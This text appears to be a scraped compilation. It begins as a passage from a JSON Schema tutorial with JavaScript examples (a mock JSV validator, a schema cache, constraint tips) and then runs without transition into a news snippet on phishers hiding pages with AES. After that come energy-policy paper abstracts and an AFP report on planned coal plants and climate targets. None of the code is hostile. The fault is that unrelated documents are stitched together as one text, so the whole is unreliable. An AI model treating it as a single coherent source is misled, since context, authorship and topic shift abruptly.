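// Stand-in for JSV (NOT the real library): createEnvironment() returns an
// object whose validate() produces a report with a JSV-style errors array.
var JSV = {
  createEnvironment: function () {
    return {
      validate: function (instance, schema) {
        var errors = [];
        Object.keys(schema.properties || {}).forEach(function (name) {
          if (schema.properties[name].required && !(name in instance)) {
            errors.push({
              message: "Property is required",
              uri: "urn:example:instance#/" + name,                 // made-up URIs
              schemaUri: "urn:example:schema#/properties/" + name,
              attribute: "required",
              details: [name]
            });
          }
        });
        return { errors: errors };
      }
    };
  }
};

// draft-03 style schema: properties are optional unless marked required.
var env = JSV.createEnvironment();
var schema = {
  type: "object",
  properties: { name: { type: "string", required: true } }
};

var report = env.validate({}, schema);
if (report.errors.length === 0) {
  console.log("JSON is valid");
} else {
  console.log(report.errors[0].message);  // "Property is required"
}
```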
JSV provides advanced failure information in the errors array. Each error may contain the following properties:
- message: Human-readable error message.
- uri: URI of the failing object location.
- schemaUri: URI of the schema location causing failure.
- attribute: Schema constraint causing failure.
- details: Free-form array that includes further information, such as expected values.
Combining JSON Schema validation with XMLHttpRequest
When writing a library to obtain schemas and validate communications, consider:
- Overhead on page load. Preloading schemas may appear attractive but can slow down page load time.
- Overhead on AJAX calls. Lazy-loading schemas will have an impact on the first call that uses each schema. Validating every communication could introduce performance issues. Consider applying validation to more complex services.
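A lazy-loading scheme like the one described above can be sketched as follows. The transport function is injected so the caching logic is independent of XMLHttpRequest, and the schema URL is hypothetical.

```javascript
// Lazily fetch each schema once and cache it; subsequent calls reuse the
// cached copy, so only the first AJAX call per schema pays the cost.
function makeSchemaLoader(fetchJson) {
  var cache = {};
  return function (url, callback) {
    if (cache[url]) { callback(cache[url]); return; }
    fetchJson(url, function (schema) {
      cache[url] = schema;
      callback(schema);
    });
  };
}

// Demonstration with a fake transport standing in for XMLHttpRequest:
var calls = 0;
var loadSchema = makeSchemaLoader(function (url, done) {
  calls++;                       // count how many real fetches happen
  done({ type: "object" });      // pretend this came over the wire
});

loadSchema("/schemas/user.json", function () {});
loadSchema("/schemas/user.json", function () {});
console.log(calls); // 1 (second request served from the cache)
```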
Writing JSON schemas
The JSON Schema definition has many nuances, so writing and testing schemas can be challenging. This article includes the JSON Schema Lint utility, which you can download, to help you create and test JSON Schema.
Hints and tips
- The JSON Schema Internet Draft (see Resources) has a full definition of the JSON Schema specification and is an invaluable resource. Be sure to look at the latest draft.
- Consider using JSON Schema to assist with documenting services. Use the description attribute to describe properties.
- When writing schemas, balance the needs of the application with validation strictness. Fully defining every attribute may make for rigorous validation, but it may also introduce fragility if the service is evolving with the application. JSON Schema allows for partial validation that can help in this area.
- Use the advanced capabilities of JSON Schema to lock down properties. You can use additionalProperties, enum, minItems, maxItems, and so on to increase constraints.
- When you need to allow for a property that might be multiple types, you can use an array to define these. Alternatively, use the "any" type when a property may hold a value of any type.
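For illustration, here is a small draft-03-style schema exercising several of the constraints mentioned in the tips above; the property names are made up.

```javascript
// enum restricts allowed values; minItems/maxItems bound array length;
// an array of types lets a property be more than one type;
// additionalProperties: false rejects unlisted properties.
var schema = {
  type: "object",
  properties: {
    status: { type: "string", "enum": ["active", "inactive"] },
    tags:   { type: "array", items: { type: "string" },
              minItems: 1, maxItems: 5 },
    id:     { type: ["string", "integer"] }
  },
  additionalProperties: false
};

console.log(schema.properties.status["enum"].length); // 2
```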
| Description | Name | Size |
| --- | --- | --- |
| Sample, showing use of dojox.json.schema | dojox_json_schema-example.html | 2KB |
| Sample, showing use of JSV | jsv-example.html | 2KB |
| Utility for creating and testing JSON Schema | jsonschema.zip | 140KB |
- JSON Schema: Learn more about the latest schemas, tools, and discussion.
- A JSON Media Type for Describing the Structure and Meaning of JSON Documents: Read the latest JSON Schema Internet Draft (a working document of the Internet Engineering Task Force (IETF)).
- Documentation for dojox.json.schema: Learn how dojox.json.schema implements JSON Schema to provide data validation against JSON Schemas.
- Andreas Kalsch's schema.js library: Get more information about this sophisticated JSON Schema-based data validation and adaptation.
- Kris Zyp's json-schema library: Read about JSON Schema specifications, reference schemas, and a CommonJS implementation.
- developerWorks Web development zone: Find articles covering various web-based solutions. See the Web development technical library for a wide range of technical articles and tips, tutorials, standards, and IBM Redbooks.
Phishers are making use of the Advanced Encryption Standard (AES) to conceal the malicious nature of their websites, according to security firm Symantec.
Nick Johnston of Symantec said: "This technique may be a first, albeit basic, attempt at using AES to obfuscate phishing sites.
"There is no attempt made to hide the key or otherwise conceal what is going on. However, we expect that as phishing detection matures further and improves in effectiveness, attacks like this will become more sophisticated."
The AES was adopted by the US government in 2002, and is used by the National Security Agency (NSA) to protect classified information in systems approved by the snooping group.
They have also made use of escape characters, which are used as part of URLs to avoid the misinterpretation of certain characters, for example by substituting "%20" for a space.
Connolly D. (University of Aalborg), Lund H. (University of Aalborg), Mathiesen B.V. (University of Aalborg), Werner S. (Halmstad University), and 6 more authors. Energy Policy, 2014.
Six different strategies have recently been proposed for the European Union (EU) energy system in the European Commission's report, Energy Roadmap 2050. The objective for these strategies is to identify how the EU can reach its target of an 80% reduction in annual greenhouse gas emissions in 2050 compared to 1990 levels. None of these scenarios involve the large-scale implementation of district heating, but instead they focus on the electrification of the heating sector (primarily using heat pumps) and/or the large-scale implementation of electricity and heat savings. In this paper, the potential for district heating in the EU between now and 2050 is identified, based on extensive and detailed mapping of the EU heat demand and various supply options. Subsequently, a new 'district heating plus heat savings' scenario is technically and economically assessed from an energy systems perspective. The results indicate that with district heating, the EU energy system will be able to achieve the same reductions in primary energy supply and carbon dioxide emissions as the existing alternatives proposed. However, with district heating these goals can be achieved at a lower cost, with heating and cooling costs reduced by approximately 15%. © 2013 Elsevier Ltd.
Papaefthymiou G. (Ecofys; Technical University of Delft) and Dragoon K. (Flink Energy Consulting). Energy Policy, 2016.
Relying almost entirely on energy from variable renewable resources such as wind and solar energy will require a transformation in the way power systems are planned and operated. This paper outlines the necessary steps in creating power systems with the flexibility needed to maintain stability and reliability while relying primarily on variable energy resources. These steps are provided in the form of a comprehensive overview of policies, technical changes, and institutional systems, organized in three development phases: an initial phase (penetration up to about 10%) characterized by relatively mild changes to conventional power system operations and structures; a dynamic middle phase (up to about 50% penetration) characterized by phasing out conventional generation and a concerted effort to wring flexibility from existing infrastructure; and the high penetration phase that inevitably addresses how power systems operate over longer periods of weeks or months when variable generation will be in either short supply, or in over-abundance. Although this transition is likely a decades-long and incremental process and depends on the specifics of each system, the needed policies, research, demonstration projects and institutional changes need to start now precisely because of the complexity of the transformation. The list of policy actions presented in this paper can serve as a guideline to policy makers on effectuating the transition and on tracking the preparedness of systems. © 2016 Elsevier Ltd.
Korsholm U.S. (Danish Meteorological Institute), Amstrup B. (Danish Meteorological Institute), Boermans T. (Ecofys), Sorensen J.H. (Danish Meteorological Institute), and Zhuang S. (Danish Meteorological Institute). Atmospheric Environment, 2012.
The effects of building insulation on ground-level concentration levels of air pollutants are considered. We have estimated regionally averaged reductions in energy consumption between 2005 and 2020 by comparing a business as usual with a very low energy building scenario for the EU-25. The corresponding reductions in air pollutant emissions were calculated using emission factors. Annual simulations with an air-quality model, where only the emission reductions due to insulation was accounted for, were compared for the scenarios, and statistically significant changes in ground-level mass concentration of main air pollutants were found. Emission reductions of up to 9% in particulate matter and 6.3% for sulphur dioxide were found in north-western Europe. Emission changes were negligible for volatile organic compounds, and carbon monoxide decreased by 0.6% over southern Europe while nitrogen oxides changed by up to 2.5% in the Baltic region. Seasonally and regionally averaged changes in ground-level mass concentrations showed that sulphur dioxide decreased by up to 6.2% and particulate matter by up to 3.6% in north-western Europe. Nitrogen oxide concentrations decreased by 1.7% in Poland and increases of up to 0.6% were found for ozone. Carbon monoxide changes were negligible throughout the modelling domain. © 2012 Elsevier Ltd.
On March 11, 2016, a consortium made up of Ecofys, the International Institute for Applied Systems Analysis, and E4tech announced that the final report on the Land Use Change study is now available online. The study was commissioned and funded by the European Commission and was focused on using the GLOBIOM model to determine indirect land use change (ILUC) associated with the ten percent renewable energy use target for transportation mandated by the European Union's 2020 goals.
Le Bourget (France) (AFP) - While scientists agree humanity needs to phase out coal within 35 years, thousands of new plants are being planned that would doom hopes of keeping global warming to safer levels, analysts said Tuesday. Greenhouse gas emitted by these 2,440 potential plants -- on top of those already in operation -- would breach the UN target of restricting the planet's temperature rise, according to a mid-range estimate by Climate Action Tracker (CAT), a respected research group. Members of the UN are striving for a pact to keep warming under two degrees Celsius (3.6 degrees Fahrenheit) higher than pre-industrial levels. Even if no new plants are built, emissions from coal-fired power generation in 2030 would be about 150 percent higher than they should be for staying under the 2C ceiling, said the CAT report, issued on the sidelines of the climate talks in Le Bourget. "There is a solution to this issue of too many coal plants on the books: cancel them," said Pieter van Breevoort of Ecofys, an energy research organisation which is part of the CAT project. "Renewable energy and stricter pollution standards are making coal plants obsolete around the world, and the earlier a coal plant is taken out of the planning process, the less it will cost." Cutting emissions is a core aim of 195 nations spending the next 10 days in Paris negotiating what is touted as a landmark post-2020 deal to roll back global warming. Despite the need to phase out greenhouse gas pollution from the energy sector, many nations -- including the United States and European Union countries -- are planning to build new coal-burning plants.
New capacity is also a key plank in the energy strategies of emerging giants like China and India, seeking a cheap and plentiful fuel for their growing economies and populations. The planned new plants -- along with existing ones which will still be running in 2030 -- would send global emissions some 400 percent over the 2C trajectory, according to the CAT report, compiled by four climate change research bodies. The estimate is based on a middle-of-the-range scenario for emissions. It said there are ways to increase coal use safely, but these would require large sums of money spent in the second half of the century on technology, including capturing and storing carbon emissions. With carbon capture and storage (CCS) technology, emissions from power plants and other sources like steel mills are trapped and stored underground, out of harm's way. Doing so would add significantly to the cost of cutting emissions, raising questions of its viability. "Renewables are so cheap that it does not make sense to deploy CCS... It's simply too expensive," Bill Hare, chief executive of the Climate Analytics think tank, told reporters in Paris. "From the CO2 emissions reduction perspective, we are far better off going to renewables and efficiency."